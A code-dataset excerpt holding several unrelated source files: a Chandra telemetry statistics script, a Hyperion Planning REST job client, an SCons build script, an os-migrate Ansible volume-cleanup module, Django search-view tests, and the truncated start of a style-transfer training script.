'rupper', 'dcount', 'ylimlower',\\\n 'ylimupper', 'rlimlower', 'rlimupper']\n\n glim = ecf.get_limit(msid, 0, mta_db, mta_cross)\n\n for category in cname_list:\n print(\"Running: \" + str(msid) + '<-->' + category )\n\n cfile1 = data_dir + 'Gratgen/' + category.capitalize() + '/' + msid + '_data.fits'\n cfile2 = data_dir + 'Gratgen/' + category.capitalize() + '/' + msid + '_short_data.fits'\n cfile3 = data_dir + 'Gratgen/' + category.capitalize() + '/' + msid + '_week_data.fits'\n\n stday = time.strftime(\"%Y:%j:00:00:00\", time.gmtime())\n tcut1 = 0.0\n tcut2 = Chandra.Time.DateTime(stday).secs - 31622400.0 #--- a year agao\n tcut3 = Chandra.Time.DateTime(stday).secs - 864000.0 #--- 10 days ago\n\n if os.path.isfile(cfile1):\n tchk = ecf.find_the_last_entry_time(cfile1)\n else:\n tchk = 0\n\n ifile = house_keeping + category\n data = mcf.read_data_file(ifile)\n start = []\n stop = []\n for ent in data:\n atemp = re.split('\\s+', ent)\n val1 = float(atemp[0])\n val2 = float(atemp[1])\n if val1 > tchk:\n start.append(val1)\n stop.append(val2)\n\n if len(start) == 0:\n continue\n\n for k in range(0, len(start)):\n diff = stop[k] - start[k]\n if diff < 300:\n start[k] -= 100\n stop[k] = start[k] + 300. \n\n data = fetch.MSID(msid, start[k], stop[k])\n\n if k == 0:\n ttime = list(data.times)\n tdata = list(data.vals)\n else:\n ttime = ttime + list(data.times)\n tdata = tdata + list(data.vals)\n\n if len(ttime) == 0:\n continue\n\n stat_out1 = get_stat(ttime, tdata, glim, 86400.0)\n stat_out2 = get_stat(ttime, tdata, glim, 3600.0)\n stat_out3 = get_stat(ttime, tdata, glim, 300.0)\n\n if tchk > 0:\n ecf.update_fits_file(cfile1, cols, stat_out1, tcut = tcut1)\n ecf.update_fits_file(cfile2, cols, stat_out2, tcut = tcut2)\n ecf.update_fits_file(cfile3, cols, stat_out3, tcut = tcut3)\n else:\n ecf.create_fits_file(cfile1, cols, stat_out1, tcut = tcut1)\n ecf.create_fits_file(cfile2, cols, stat_out2, tcut = tcut2)\n ecf.create_fits_file(cfile3, cols, stat_out3, tcut = tcut3)\n\n#-------------------------------------------------------------------------------------------\n#-- get_stat: compute stat for the given data --\n#-------------------------------------------------------------------------------------------\n\ndef get_stat(ttime, tdata, glim, step):\n \"\"\"\n compute stat for the given data \n input: ttime --- a list of time data\n tdata --- a list of data\n glim --- a lower and upper limit values\n output: wtime --- a list of time in sec from 1998.1.1\n wdata --- a list of the mean of each interval\n wmed --- a list of the median of each interval\n wstd --- a list of the std of each interval\n wmin --- a list of the min of each interval\n wmax --- a list of the max of each interval\n wyl --- a list of the rate of yellow lower violation\n wyu --- a list of the rate of yellow upper violation\n wrl --- a list of the rate of red lower violation\n wru --- a list of the rate of red upper violation\n wcnt --- a list of the total data counts\n wyl --- a list of the lower yellow limits\n wyu --- a list of the upper yellow limits\n wrl --- a list of the lower red limits\n wru --- a list of the upper red limits\n \"\"\"\n\n wtime = []\n wdata = []\n wmed = []\n wstd = []\n wmin = []\n wmax = []\n wyl = []\n wyu = []\n wrl = []\n wru = []\n wcnt = []\n wsave = []\n\n dtime = numpy.array(ttime)\n ddata = numpy.array(tdata)\n\n spos = 0\n chk = 1\n send = dtime[spos]\n\n for k in range(0, len(dtime)):\n if dtime[k] < send:\n chk = 0\n else:\n sdata = ddata[spos:k]\n if len(sdata) < 1:\n continue\n\n avg = sdata.mean()\n med = numpy.median(sdata)\n sig = sdata.std()\n try:\n amin = sdata.min()\n amax = sdata.max()\n except:\n amin = 0\n amax = 0\n ftime = dtime[spos + int(0.5 * (k-spos))]\n vlimits = uds.find_violation_range(glim, ftime)\n [yl, yu, rl, ru, tot] = uds.find_violation_rate(sdata, vlimits)\n wtime.append(ftime)\n wdata.append(avg)\n wmed.append(med)\n wstd.append(sig)\n wmin.append(amin)\n wmax.append(amax)\n wyl.append(yl)\n wyu.append(yu)\n wrl.append(rl)\n wru.append(ru)\n wcnt.append(tot)\n wsave.append(vlimits)\n \n spos = k\n send = dtime[k] + step\n chk = 1\n#\n#--- check whether there are any left over; if so add it to the data lists\n#\n if chk == 0:\n\n sdata = ddata[spos:k]\n avg = sdata.mean()\n med = numpy.median(sdata)\n sig = sdata.std()\n amin = sdata.min()\n amax = sdata.max()\n ftime = dtime[spos + int(0.5 * (k-spos))]\n vlimits = uds.find_violation_range(glim, ftime)\n [yl, yu, rl, ru, tot] = uds.find_violation_rate(sdata, vlimits)\n wtime.append(ftime)\n wdata.append(avg)\n wmed.append(med)\n wstd.append(sig)\n wmin.append(amin)\n wmax.append(amax)\n wyl.append(yl)\n wyu.append(yu)\n wrl.append(rl)\n wru.append(ru)\n wcnt.append(tot)\n wsave.append(vlimits)\n\n vtemp = [[], [], [], []]\n for k in range(0, len(wsave)):\n for m in range(0, 4):\n vtemp[m].append(wsave[k][m])\n\n wdata = [wtime, wdata, wmed, wstd, wmin, wmax, wyl, wyu, wrl, wru, wcnt] + vtemp\n\n return wdata\n\n#--------------------------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) > 1:\n ltype = sys.argv[1]\n else: \n ltype = ''\n\n gratgen_categorize_data()\n","sub_path":"MTA_limit_trends/Gratgen/gratgen_categorize_data.py","file_name":"gratgen_categorize_data.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"414532785","text":"\"\"\"\nThis module defines the functions that interact with the Planning REST API.\n\nUse these functions together to 'compose' a specific action, like\nimporting metadata, cube refresh, etc.\n\nMost of these functions raise Exception on error. The calling scripts can\nre-raise the the Exceptions after logging or ignore them to let the\nprogram abort.\n\"\"\"\n\n# standard library\nimport time\nimport json\nimport queue\nfrom typing import List\n\n# 3rd party library\nimport requests\n\n# Functions defined:\n\n# isSuccessful\n# isProcessing\n# isError\n# getApiVersion\n# getJobs\n# postJob\n# executeJob\n# pingUntilCompleted\n\n\ndef isSuccessful(status: int) -> bool:\n \"\"\"\n Returns whether status code == 0\n\n Args:\n status (int): Status from parsed API response\n\n Returns:\n bool: True if successful else False\n \"\"\"\n return int(status) == 0\n\n\ndef isError(status: int) -> bool:\n \"\"\"\n Returns whether status code > 0\n\n Args:\n status (int): Status from parsed API response\n\n Returns:\n bool: True if error else False\n \"\"\"\n return int(status) > 0\n\n\ndef isProcessing(status: int) -> bool:\n \"\"\"\n Returns whether status code < 0\n\n Args:\n status (int): Status from parsed API response\n\n Returns:\n bool: True if processing else False\n \"\"\"\n return int(status) < 0\n\n\ndef getApiVersion(client) -> str:\n \"\"\"\n GET latest version of the Planning API and return it to the caller.\n\n Args:\n client (Client): Client object for request info and logger\n\n Returns:\n str: Planning API latest version\n\n Raises:\n Exception\n \"\"\"\n try:\n client.logger.debug(\"Fetching planning API version\")\n\n url = client.cloudUrl + \"HyperionPlanning/rest/\"\n response = requests.get(url, auth=client.auth)\n response.raise_for_status() # raise exception if status > 400\n data = response.json()\n\n items = data[\"items\"]\n for item in items:\n if item[\"isLatest\"]:\n version = item[\"version\"]\n message = \"Fetched latest planning API version: \" + version\n client.logger.debug(message)\n return version\n except Exception:\n # print error details and re-raise\n message = \"Exception while trying to get planning API verson\"\n client.logger.exception(message)\n raise\n\n\ndef getJobs(client, version, jobType=None) -> List[dict]:\n \"\"\"\n GET list of jobs.\n If jobType is provided, the filter will be applied to the request.\n Returns jobList as list of dicts. Raises exception on errors.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n jobType (str, optional): Job type filter to apply to request\n\n Returns:\n list of dict: List of jobs from jobdefinitions. The items of the\n list are python dicts which have jobType, jobName key/values etc.\n\n Raises:\n Exception\n \"\"\"\n try:\n message = \"Fetching job list\"\n if jobType:\n message += \" - \" + jobType # append jobType if provided\n client.logger.debug(message)\n\n url = (\n client.cloudUrl\n + \"HyperionPlanning/rest/\"\n + version\n + \"/applications/\"\n + client.appName\n + \"/jobdefinitions\"\n )\n if jobType is not None: # add query param for specifying jobType\n url += \"?q={\\\"jobType\\\":\\\"%s\\\"}\" % jobType\n response = requests.get(url, auth=client.auth)\n response.raise_for_status() # raise exception if status > 400\n data = response.json()\n\n items = data[\"items\"]\n jobList = items\n # Logging\n message = \"Fetched job list successfully\"\n client.logger.debug(message)\n return jobList\n except Exception:\n client.logger.exception(\"Exception raised while trying to get jobs\")\n raise\n\n\ndef buildQueueFromList(jobOrder, jobList) -> queue.Queue:\n \"\"\"\n Creates and returns a FIFO queue object from the jobOrder and jobList.\n Appends refresh cube job at the end of the queue.\n Raises exception if a job in the jobOrder is not found in the jobList.\n\n Args:\n jobOrder (tuple): Tuple of jobsNames in order\n jobList (list): List of job dicts\n\n Returns:\n jobQueue (queue.Queue): A FIFO queue of job dicts\n\n Raises:\n Exception: If jobName from jobOrder has no match in jobList\n \"\"\"\n jobQueue = queue.Queue()\n for jobName in jobOrder: # traverses the tuple in order\n\n # fetch current job from jobList where jobName matches\n job = next(filter(lambda j: j[\"jobName\"] == jobName, jobList))\n\n if job is None:\n raise Exception(jobName + \" not found in jobList\")\n\n # add file name as job parameter\n job[\"parameters\"] = {\n \"importZipFile\": jobName + \".csv\"\n }\n\n jobQueue.put(job)\n\n # finally put the refresh cube job into the queue as the last job\n refreshCubeJob = {\"jobType\": \"CUBE_REFRESH\", \"jobName\": \"cuberefresh\"}\n jobQueue.put(refreshCubeJob)\n return jobQueue\n\n\ndef postJob(client, version, job: dict) -> str:\n \"\"\"\n POST the job dict passed as argument.\n The job passed in must be a dictionary containing \"jobType\",\n \"jobName\" key/values.\n If the job has a property \"parameters\" then it will be added to\n the request body.\n Returns jobId if job post successful. Raises exception on error.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n job (dict): Dict containing jobType, jobName and possibly properties\n\n Returns:\n str: jobId if job post successful\n\n Raises:\n Exception\n \"\"\"\n try:\n client.logger.debug(\"Sending POST request\")\n\n body = {\"jobType\": job[\"jobType\"], \"jobName\": job[\"jobName\"]}\n if \"parameters\" in job:\n body[\"parameters\"] = job[\"parameters\"]\n\n url = (\n client.cloudUrl\n + \"HyperionPlanning/rest/\"\n + version\n + \"/applications/\"\n + client.appName\n + \"/jobs\"\n )\n headers = {\"content-type\": \"application/json\"}\n response = requests.post(\n url, data=json.dumps(body), headers=headers, auth=client.auth)\n response.raise_for_status() # raise exception if status > 400\n data = response.json()\n\n status = data[\"status\"]\n\n if isProcessing(status):\n message = \"Job sent to server and is being processed...\"\n client.logger.debug(message)\n\n elif isError(status):\n message = \"Error status received - API response below\"\n client.logger.error(message, data)\n raise Exception(data[\"details\"])\n\n elif isSuccessful(status):\n client.logger.debug(\"Job {} successful\".format(job[\"jobName\"]))\n\n if \"jobId\" in data:\n return str(data[\"jobId\"])\n else:\n raise Exception(\"No jobId in response\")\n except Exception:\n client.logger.exception(\"Exception raised while trying to POST job\")\n raise\n\n\ndef executeJobsFromQueue(client, version, jobQueue: queue.Queue) -> None:\n \"\"\"\n Executes each job pulled from the job queue passed as a parameter.\n If a job execution fails for any reason, the details will be logged\n and loop will continue with the next job in the queue.\n Raises exception if any unexpected errors occur.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n jobQueue (queue.Queue): Python FIFO queue with job dicts arranged\n in the execution order specific to an application.\n\n Raises:\n Exception\n \"\"\"\n try:\n # execute jobs in sequence from the queue\n while not jobQueue.empty():\n job = jobQueue.get()\n\n # set process attribute for logger\n client.logger.process = job[\"jobName\"]\n\n try:\n executeJob(client, version, job)\n except Exception:\n # Do nothing but log if current job fails\n client.logger.debug(\"failed - Moving on to next job in queue\")\n\n except Exception as err:\n client.logger.error(\n \"While trying to get and execute jobs from queue\", err)\n raise\n\n\ndef executeJob(client, version, job: dict):\n \"\"\"\n Wraps the function calls to post a job and to ping until completion so\n a client doesn't have to call both functions. Call this function\n and pass it the job.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n job (dict): Dict containing job info\n \"\"\"\n jobId = postJob(client, version, job)\n pingUntilCompleted(client, version, jobId)\n\n\ndef pingUntilCompleted(client, version, jobId) -> bool:\n \"\"\"\n Check job status for passed in jobId and api version until\n complete or error. Raises exception on error.\n\n Note: Only used for checking job status of Hyperion Planning jobs.\n\n Args:\n client (Client): Client object for request info and logger\n version (str): Planning API version\n jobId (str): Id of job to ping\n\n Returns:\n bool: True on successful finish\n\n Raises:\n Exception\n \"\"\"\n try:\n client.logger.debug(\"Sending first ping for job status\")\n\n url = (\n client.cloudUrl\n + \"HyperionPlanning/rest/\"\n + version\n + \"/applications/\"\n + client.appName\n + \"/jobs/\"\n + jobId\n )\n done = False\n while not done:\n response = requests.get(url, auth=client.auth)\n response.raise_for_status() # raise exception if status > 400\n data = response.json()\n status = data[\"status\"]\n\n if isSuccessful(status):\n message = data[\"details\"]\n client.logger.debug(message)\n done = True # breaks out of loop\n\n elif isError(status):\n message = \"Error status while pinging - API response below\"\n client.logger.error(message, data)\n\n if \"child jobs have failed\" in data[\"details\"]:\n _logChildJobErrorList(client, data[\"links\"])\n \n raise Exception(data[\"details\"])\n \n else:\n # processing\n message = str(data[\"descriptiveStatus\"])\n client.logger.debug(message + \" - Pinging in 3 seconds...\")\n time.sleep(3)\n\n except Exception:\n client.logger.exception(\"Exception raised while pinging\")\n raise\n else:\n return True # if we reached here, all went well\n\n\ndef _getLinkByRel(links, rel: str) -> str:\n \"\"\"\n Module helper function.\n Gets the 'href' value of a link object where 'rel' property matches the function parameter.\n\n Args:\n links (list of dicts): List of links that are part of API response.\n rel (str): The rel value for which to return the link\n Returns:\n link (str): The 'href' value where 'rel' matches parameter\n \"\"\"\n return [link[\"href\"] for link in links if link[\"rel\"] == rel][0]\n\n\ndef _logChildJobErrorList(client, links):\n \"\"\"\n Module helper function to log the child job error messages for a failed job.\n\n Args:\n client (Client): Client object containing auth and logger\n links (list of dicts): List of reference links from the API response \n \"\"\"\n\n # pull link from links list\n jobDetailsUrl = _getLinkByRel(links, \"job-details\")\n\n response = requests.get(jobDetailsUrl, auth=client.auth)\n data = response.json()\n\n # get list of links from the first item\n links = data[\"items\"][0][\"links\"]\n\n # pull link for child-job-details from list of links\n childJobDetailsUrl = _getLinkByRel(links, \"child-job-details\")\n\n limit = 20\n # only log first number of errors specified by limit\n queryParamString = \"?q={\\\"messageType\\\":\\\"ERROR\\\"}&limit=\" + limit\n response = requests.get(childJobDetailsUrl +\n queryParamString, auth=client.auth)\n data = response.json()\n\n errorMessages = data[\"items\"]\n client.logger.error(\n \"See details of failed child jobs at url:\", childJobDetailsUrl)\n client.logger.error(\"Failed Child Jobs [limit {}]:\".format(limit), errorMessages)\n","sub_path":"src/epm/planning.py","file_name":"planning.py","file_ext":"py","file_size_in_byte":12571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"13980239","text":"Import('*')\nimport re\nimport sys, os, glob, fnmatch\nimport prebuild\nsys.path.append(Dir('#').abspath + \"\\\\site_scons\\\\site_tools\")\n\ncwd = re.sub( r'output\\\\objs\\\\','''''' , Dir(\".\").abspath)\nobjects = []\nsources = []\nassemblys = []\nincludes = []\n\nlst = os.listdir(cwd)\n\nfor d in lst:\n path = os.path.join(cwd, d)\n if (os.path.isfile(os.path.join(path, 'SConscript'))):\n objects = objects + SConscript(os.path.join(d, 'SConscript'), exports='env')\n if (glob.glob(os.path.join(path, '*.h'))):\n includes.append(str(d))\n if (glob.glob(os.path.join(path, '*.c')) or glob.glob(os.path.join(path, '*.asm'))):\n for f in os.listdir(os.path.join(cwd,str(d))):\n src = os.path.join(str(d), str(f))\n if f.endswith('.c'):\n sources.append(str(src))\n elif f.endswith('.asm'):\n assemblys.append(str(src))\n# ADD INCLUDE DIRECTORIES\nincludes = list( set(includes) )\n\nif includes != '':\n for include in includes:\n env.Append(CPPPATH=[Dir(include).abspath])\n string = re.sub( r'output\\\\objs\\\\','''''' ,Dir(include).abspath)\n prebuild.createSymlinkHeader( os.path.join(Dir('#').abspath,env['CEN_HEADER_DIR']),string )\n\n# COMPILE SOURCE FILES\nif sources != '':\n for source in sources:\n m = re.match(r'(.+\\/|.+\\\\)(.*)(\\.c$)', source)\n target = m.group(2) + \".o\"\n objects += env.Object(target, source)\n\nif assemblys != '':\n for assembly in assemblys:\n m = re.match(r'(.+\\/|.+\\\\)(.*)(.asm$)', assembly)\n target = m.group(2) + \".o\"\n objects += env.Object(target, assembly)\n\n\n# RETURN\nReturn('objects')","sub_path":"Targets/TC275/MCAL/MCAL_Modules/Dio/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"529553606","text":"#!/usr/bin/python\n\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: import_workload_dst_failure_cleanup\n\nshort_description: Clean up temporary volumes after a workload migration\n\nextends_documentation_fragment: openstack\n\nversion_added: \"2.9.0\"\n\nauthor: \"OpenStack tenant migration tools (@os-migrate)\"\n\ndescription:\n - Remove any volumes associated with a failed workload migration in the destination cloud.\n\noptions:\n auth:\n description:\n - Required if 'cloud' param not used.\n required: false\n type: dict\n auth_type:\n description:\n - Auth type plugin for destination OpenStack cloud. Can be omitted if using password authentication.\n required: false\n type: str\n region_name:\n description:\n - Destination OpenStack region name. Can be omitted if using default region.\n required: false\n type: str\n availability_zone:\n description:\n - Availability zone.\n required: false\n type: str\n cloud:\n description:\n - Cloud resource from clouds.yml\n - Required if 'auth' param not used\n required: false\n type: raw\n validate_certs:\n description:\n - Validate HTTPS certificates when logging in to OpenStack.\n required: false\n type: bool\n conversion_host:\n description:\n - Dictionary with information about the destination conversion host (address, status, name, id)\n required: true\n type: dict\n data:\n description:\n - Data structure with server parameters as loaded from OS-Migrate workloads YAML file.\n required: true\n type: dict\n log_file:\n description:\n - Path to store a log file for this conversion process.\n required: false\n type: str\n state_file:\n description:\n - Path to store a transfer progress file for this conversion process.\n required: false\n type: str\n ssh_key_path:\n description:\n - Path to an SSH private key authorized on the destination cloud.\n required: true\n type: str\n ssh_user:\n description:\n - The SSH user to connect to the conversion hosts.\n required: true\n type: str\n transfer_uuid:\n description:\n - A UUID used to keep track of this tranfer's resources on the conversion hosts.\n - Provided by the import_workloads_export_volumes module.\n required: true\n type: str\n volume_map:\n description:\n - Dictionary providing information about the volumes to transfer.\n - Provided by the import_workloads_export_volumes module.\n required: true\n type: dict\n timeout:\n description:\n - Timeout for long running operations, in seconds.\n required: false\n default: 1800\n type: int\n'''\n\nEXAMPLES = '''\n rescue:\n - name: clean up in the destination cloud after migration failure\n os_migrate.os_migrate.import_workload_dst_failure_cleanup:\n auth: \"{{ os_migrate_src_auth }}\"\n auth_type: \"{{ os_migrate_src_auth_type|default(omit) }}\"\n region_name: \"{{ os_migrate_src_region_name|default(omit) }}\"\n validate_certs: \"{{ os_migrate_src_validate_certs|default(omit) }}\"\n ca_cert: \"{{ os_migrate_src_ca_cert|default(omit) }}\"\n client_cert: \"{{ os_migrate_src_client_cert|default(omit) }}\"\n client_key: \"{{ os_migrate_src_client_key|default(omit) }}\"\n data: \"{{ item }}\"\n conversion_host:\n \"{{ os_src_conversion_host_info.openstack_conversion_host }}\"\n ssh_key_path: \"{{ os_migrate_conversion_keypair_private_path }}\"\n ssh_user: \"{{ os_migrate_conversion_host_ssh_user }}\"\n transfer_uuid: \"{{ exports.transfer_uuid }}\"\n volume_map: \"{{ exports.volume_map }}\"\n state_file: \"{{ os_migrate_data_dir }}/{{ prelim.server_name }}.state\"\n log_file: \"{{ os_migrate_data_dir }}/{{ prelim.server_name }}.log\"\n when:\n - prelim.changed\n - os_migrate_workload_cleanup_on_failure\n\n - fail:\n msg: \"Failed to import {{ item.params.name }}!\"\n'''\n\nRETURN = '''\n'''\n\nfrom ansible.module_utils.basic import AnsibleModule\n# Import openstack module utils from ansible_collections.openstack.cloud.plugins as per ansible 3+\ntry:\n from ansible_collections.openstack.cloud.plugins.module_utils.openstack \\\n import openstack_full_argument_spec, openstack_cloud_from_module\nexcept ImportError:\n # If this fails fall back to ansible < 3 imports\n from ansible.module_utils.openstack \\\n import openstack_full_argument_spec, openstack_cloud_from_module\n\nfrom ansible_collections.os_migrate.os_migrate.plugins.module_utils import server\n\nfrom ansible_collections.os_migrate.os_migrate.plugins.module_utils.workload_common \\\n import use_lock, ATTACH_LOCK_FILE_DESTINATION, DEFAULT_TIMEOUT, OpenStackHostBase\n\nimport time\n\n\nclass OpenStackDstFailureCleanup(OpenStackHostBase):\n \"\"\" Removes volumes after a failed migration from the destination cloud. \"\"\"\n\n def __init__(self, openstack_connection, destination_conversion_host_id,\n ssh_key_path, ssh_user, transfer_uuid, volume_map,\n state_file=None, log_file=None, timeout=DEFAULT_TIMEOUT):\n\n super().__init__(\n openstack_connection,\n destination_conversion_host_id,\n ssh_key_path,\n ssh_user,\n transfer_uuid,\n state_file=state_file,\n log_file=log_file,\n timeout=timeout,\n )\n self.volume_map = volume_map\n\n def delete_migrated_volumes(self):\n \"\"\" Detach destination volumes from converter and delete them. \"\"\"\n self._detach_volumes_from_converter()\n self._delete_volumes()\n\n def _volume_still_attached(self, volume, vm):\n \"\"\" Check if a volume is still attached to a VM. \"\"\"\n for attachment in volume.attachments:\n if attachment.server_id == vm.id:\n return True\n return False\n\n def _get_volume_maybe(self, id_maybe):\n \"\"\" Get volume by id, or None if id_maybe is None or if volume doesn't exist. \"\"\"\n if not id_maybe:\n return None\n return self.conn.get_volume_by_id(id_maybe)\n\n @use_lock(ATTACH_LOCK_FILE_DESTINATION)\n def _detach_volumes_from_converter(self):\n \"\"\" Detach volumes from conversion host. \"\"\"\n self.log.info('Detaching volumes from the destination conversion host.')\n converter = self._converter()\n for path, mapping in self.volume_map.items():\n volume = self._get_volume_maybe(mapping['dest_id'])\n if not volume:\n continue\n if not self._volume_still_attached(volume, converter):\n self.log.info('Volume %s is not attached to conversion host, skipping detach.',\n volume['id'])\n continue\n\n self.log.info('Detaching volume %s.', volume['id'])\n self.conn.detach_volume(server=converter, volume=volume,\n timeout=self.timeout, wait=True)\n for second in range(self.timeout):\n converter = self._converter()\n volume = self.conn.get_volume_by_id(mapping['dest_id'])\n if not self._volume_still_attached(volume, converter):\n break\n time.sleep(1)\n else:\n raise RuntimeError('Timed out waiting to detach volumes from '\n 'destination conversion host!')\n\n def _delete_volumes(self):\n \"\"\" Delete destination volumes. \"\"\"\n self.log.info('Deleting migrated volumes from destination.')\n for path, mapping in self.volume_map.items():\n volume = self._get_volume_maybe(mapping['dest_id'])\n if not volume:\n continue\n if volume.attachments:\n self.log.warning('Volume %s is still has attachments, skipping delete.',\n volume['id'])\n continue\n\n self.log.info('Deleting volume %s.', volume['id'])\n self.conn.delete_volume(volume['id'], timeout=self.timeout, wait=True)\n\n\ndef run_module():\n argument_spec = openstack_full_argument_spec(\n data=dict(type='dict', required=True),\n conversion_host=dict(type='dict', required=True),\n ssh_key_path=dict(type='str', required=True),\n ssh_user=dict(type='str', required=True),\n transfer_uuid=dict(type='str', required=True),\n volume_map=dict(type='dict', required=True),\n state_file=dict(type='str', default=None),\n log_file=dict(type='str', default=None),\n timeout=dict(type='int', default=DEFAULT_TIMEOUT),\n )\n\n result = dict(\n changed=False,\n )\n\n module = AnsibleModule(\n argument_spec=argument_spec,\n )\n\n sdk, conn = openstack_cloud_from_module(module)\n src = server.Server.from_data(module.params['data'])\n params, info = src.params_and_info()\n\n # Required parameters\n destination_conversion_host_id = module.params['conversion_host']['id']\n ssh_key_path = module.params['ssh_key_path']\n ssh_user = module.params['ssh_user']\n transfer_uuid = module.params['transfer_uuid']\n volume_map = module.params['volume_map']\n\n # Optional parameters\n state_file = module.params.get('state_file', None)\n log_file = module.params.get('log_file', None)\n timeout = module.params['timeout']\n\n failure_cleanup = OpenStackDstFailureCleanup(\n conn,\n destination_conversion_host_id,\n ssh_key_path,\n ssh_user,\n transfer_uuid,\n volume_map,\n state_file=state_file,\n log_file=log_file,\n timeout=timeout,\n )\n failure_cleanup.delete_migrated_volumes()\n\n module.exit_json(**result)\n\n\ndef main():\n run_module()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"os_migrate/plugins/modules/import_workload_dst_failure_cleanup.py","file_name":"import_workload_dst_failure_cleanup.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"46021515","text":"from django.test import TestCase\nfrom django.contrib.auth import get_user_model\nfrom products.models import Product, Category, Favorite, Comment\nfrom django.test import Client\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom django.utils import timezone\n\n\nclass TestSearchView(TestCase):\n \"\"\" All the tests for Search view \"\"\"\n #test search unhealthy product to send to jquery\n def setUp(self):\n self.cat = Category.objects.create(\n name_cat = 'yaourt',\n )\n\n Product.objects.create(\n name_prod='test product',\n nutrition_grade='e',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/376/020/616/0102/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/376/020/616/0102/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160102/yaourt-artisanal-noix-de-coco-ibaski',\n category = Category.objects.get(name_cat=self.cat)\n )\n self.e_product = Product.objects.get(name_prod='test product')\n\n\n Product.objects.create(\n name_prod='test product 2',\n nutrition_grade='a',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/345/020/616/0102/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/345/020/616/0102/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160103/yaourt-artisanal-noix-de-coco-ibaski',\n category = Category.objects.get(name_cat=self.cat)\n )\n self.a_product = Product.objects.get(name_prod='test product 2')\n\n Product.objects.create(\n name_prod='test 3',\n nutrition_grade='e',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/376/020/616/0103/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/376/020/616/0103/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160103/yaourt-artisanal-noix-de-coco-ibaski',\n category = Category.objects.get(name_cat=self.cat)\n )\n self.e_product_2 = Product.objects.get(name_prod='test 3')\n\n\n User.objects.create(\n first_name='user_test',\n username='utilisateur@gmail.com',\n password='mot_de_passe'\n )\n self.users = User.objects.get(first_name=\"user_test\")\n\n Favorite.objects.create(\n product=self.e_product,\n substitute=self.a_product,\n user=self.users\n )\n self.subs = Favorite.objects.get(substitute=self.a_product)\n\n Comment.objects.create(\n product = Product.objects.get(name_prod='test product 2'),\n author = User.objects.get(first_name='user_test'),\n text = 'Très bon et pas cher',\n created_date = timezone.now(),\n # created_date = '2019-04-16 12:08',\n approved_comment = True\n )\n self.comment = Comment.objects.get(text='Très bon et pas cher')\n\n\n def test_search_unhealthy(self):\n get_product = Product.objects.filter(\n nutrition_grade__range = ('d','e'), name_prod__icontains = 'test product')\n for item in get_product:\n my_product = f'{item.name_prod}'\n self.assertEqual(my_product, 'test product')\n\n #test search healthy product\n def test_search_healthy(self):\n get_product = Product.objects.filter(\n nutrition_grade__range = ('a','b'), name_prod__icontains = 'test product 2')\n for item in get_product:\n my_product = f'{item.name_prod}'\n self.assertEqual(my_product, 'test product 2')\n\n # #test search page is called\n # def test_uses_search_template(self):\n # response = self.client.get(reverse(\"search:search\"))\n # self.assertEqual(response.status_code, 200)\n\n#test detail page - product exists\n def test_product_detail_view_exist(self):\n id_exist = Product.objects.get(name_prod='test product').id\n response = self.client.get(reverse('search:details', args=(id_exist,)))\n self.assertEqual(response.status_code, 200)\n\n#test favorite page - get favorite for a specific user\n def test_get_favorite(self):\n subs_id = self.subs.id\n response = self.client.get('favorite', args=(subs_id,))\n fav = Favorite.objects.first()\n self.assertEqual(self.users, fav.user)\n\n#test comment belongs to the right user\n def test_comment_displayed(self):\n id_healthy = Product.objects.get(name_prod='test product 2')\n self.get_author = Comment.objects.get(product=id_healthy,\n approved_comment=True)\n user = User.objects.first()\n self.assertEqual(self.get_author.author, user)\n\n#test paginator - access an existing page\n def test_access_search(self):\n #access first page\n results = Product.objects.get(name_prod='test product')\n num = 1\n url = '?page={0}&txtSearch={1}'.format(num, results)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n#access non existing page\n def test_no_access_search(self):\n for i in range(15):\n Product.objects.create(\n name_prod='test product pagination',\n nutrition_grade='a',\n rep_nutritionnel='https://static.openfoodfacts.org/images/products/376/020/616/0109/ingredients_fr.12.full.jpg',\n image = 'https://static.openfoodfacts.org/images/products/376/020/616/0109/front_fr.11.full.jpg',\n url = 'https://fr.openfoodfacts.org/produit/3760206160102/yaourt',\n category = Category.objects.get(name_cat=self.cat))\n\n results_bis = Product.objects.get(name_prod='test product 2')\n num_bis = 4\n url_bis = '?page={0}&txtSearch={1}'.format(num_bis, results_bis)\n response = self.client.get(\"search/{0}\".format(url_bis))\n self.assertEqual(response.status_code, 404)\n","sub_path":"search/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"531373540","text":"import argparse\nimport logging\nimport json\nimport os\nimport datetime\nimport keras\n\nfrom collections import namedtuple\nfrom style_transfer import trainer\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('train_network')\n\n# The default layers are those suggested by Johnson et 